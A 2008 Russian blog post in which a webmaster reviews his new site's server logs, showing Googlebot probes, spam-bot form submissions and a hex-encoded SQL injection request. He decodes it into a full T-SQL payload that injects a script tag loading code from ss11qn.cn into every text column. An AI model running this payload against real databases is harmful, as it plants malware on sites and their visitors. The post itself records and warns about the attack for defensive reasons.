23 сент. 2008 г.

Про серверные логи. Пост ни о чем.

Пост ни о чем, т.е. о том как я заглянул в серверные логи, а там и хакеры и спамилки и ботов тучи. Сайту месяц от роду. В принципе это чтение пустая трата времени, мне было интересно и поучительно в свете вчерашнего скана от wordpress.com.

Значит смотрю я логи своего нового сайта. Гугл его любит, поэтому встречаются такие запросы:

66.249.71.100 - - [20/Sep/2008:16:52:34 -0700] "GET /hyqrcywr.html HTTP/1.1" 404 32059 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Страницы hyqrcywr.html на сайте нет. Это гуглоробот проверяет, как у меня 404 отрабатывается.

А вот нахеры что-то мутят:
59.160.78.130 - - [20/Sep/2008:06:20:58 -0700] "GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44_тут было 1220 шестнадцатеричных цифр_72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 404 22522 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)"

Через четыре секунды повтор. Под 1224 цифрами был зашит текст (квадратнные скобки заменить на угловые)

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"][/title][script src="http://www3.ss11qn.cn/csrss/w.js"][/script][!--''+['+@C+'] where '+@C+' not like ''%"][/title][script src="http://www3.ss11qn.cn/csrss/w.js"][/script][!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Рекомендую проверить свои мускли на предмет этого ss11qn.cn, на сайте нортон сейф вэба он есть:
ss11qn.cn
Summary

  • Threats to your computer: 19
  • Threats to your identity: 0
  • Nuisance factors: 0
Total threats on this site: 19


А вот и спамилка появилась:

Вот она нашла мой сайт
217.169.46.98 - - [18/Sep/2008:10:42:48 -0700] "GET /county-florida.html HTTP/1.1" 200 41080 "-" "Mozilla/4.0"

Через два дня пришла спамить с разных айпишников. Только форма оказалась не типовая :)
217.169.46.98 - - [20/Sep/2008:09:07:54 -0700] "GET /s-guidebook.html HTTP/1.1" 200 42619 "-" "Mozilla/4.0"
168.187.216.238 - - [20/Sep/2008:09:07:58 -0700] "GET /s-guidebook.html HTTP/1.1" 200 42619 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
217.169.46.98 - - [20/Sep/2008:09:08:01 -0700] "GET /Sign-Up.php HTTP/1.1" 404 36721 "-" "Mozilla/4.0"
168.187.216.238 - - [20/Sep/2008:09:08:03 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36870 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
75.94.46.82 - - [20/Sep/2008:09:08:09 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36779 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
71.226.210.20 - - [20/Sep/2008:09:08:12 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36835 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.180.79.94 - - [20/Sep/2008:09:08:17 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36690 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
68.62.202.151 - - [20/Sep/2008:09:08:21 -0700] "POST /Sign-Up.php HTTP/1.1" 404 36724 "http://_my_site_.com/s-guidebook.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Всё отдохнул, пошел дальше работать. И вам успехов желаю.
Прочитать полностью...